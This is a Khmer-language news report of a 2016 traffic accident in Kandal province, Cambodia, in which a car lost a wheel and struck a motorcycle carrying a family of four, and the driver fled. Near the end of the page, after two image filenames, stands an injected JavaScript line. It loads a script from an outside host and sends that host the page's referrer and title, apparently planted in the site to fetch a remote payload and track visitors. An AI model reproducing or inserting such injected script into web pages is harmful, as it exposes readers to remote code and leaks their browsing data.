ជិះម៉ូតូសុខៗ ត្រូវរថយន្តបុកគ្រោះថ្នាក់៤នាក់ឪពុកម្តាយកូន

កណ្តាល៖ មនុស្ស៤នាក់របួសធ្ងន់ស្រាល ក្នុងនោះ៣នាក់ឪពុកកូនរបួសធ្ងន់ឯម្តាយរបួសស្រាល ក្នុងហេតុការណ៏គ្រោះថ្នាក់ចរាចរផ្លូវគោករវាងរថយន្ត និងម៉ូតូ កាលពីវេលាម៉ោង៦និង៥០នាទីព្រកថ្ងៃទី១៤ខែកញ្ញាឆ្នាំ២០១៦នេះនៅលើផ្លូវជាតិលេខ៣ លើផ្លូវ៣ ចន្លោះគីឡូម៉ែត ៣២-៣៣នៅចំនុចភូមិ តាឡឹកឃុំត្រស្រុពាំងវែង ស្រុកកណ្ដាលស្ទឹង ខេត្កកណ្ដាល។

សមត្ថកិច្ចបានអោយដឹងថាជនរងគ្រោះជាឪពុកមានឈ្មោះ ឡាម រិត ភេទប្រុស អាយុ២៦ឆ្នាំ រស់នៅភូមិខ្លាលោត ឃុំកំពង់ត្រាចស្រុករមាសហែក ខេត្តស្វាយរៀង បានជិះម៉ូតូម៉ាកស្មាក់ពណ៍ខ្មៅ ពាក់ផ្លាក់លេខតាកែវ 1A-7673 ឌុបកូន២នាក់និងប្រពន្ធម្នាក់ ក្នុងទិសដៅពីតាកែវ មកភ្នំពេញ លុះមកដល់កន្លែងកើត រថយន្តបង្ក ស្រាប់តែរថយន្តដាច់រ៉ូទីលខាងមុខរ៉េចង្កូតទៅបុក ម៉ូតូច្រាសទិសគ្នាតែម្តង។ ឃើញដូចនេះជនបង្កបានរត់ចុះពីរថយន្តគេចខ្លួនបាត់ បន្សល់រថយន្តម៉ាកហ៊ិនដាយពណ៍ប្រផេះ ពាក់ស្លាកលេខភ្នំពេញ3C-0125នៅកន្លែងកើតហេតុ។

ក្រោយកើតហេតុជនរងគ្រោះត្រូវបានសមត្ថកិច្ចបញ្ជូនទៅព្យាបាលនៅមន្ទីរពេទ្យព្រកុសម: ពេទ្យលោកសង្ឃដើម្បីសង្គ្រោះ។ដោយឡែក ម៉ូតូនិងរថយន្ត បានយកមករក្សារទុកនៅអធិការដ្ឋាននគរបាលកណ្ដាលស្ទឹង ដើម្បីដោះស្រាយគ្នានៅពេលក្រោយ៕

14330129_573121979542410_2613450105090932232_n 14368738_573121969542411_3524508231171419193_n

s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More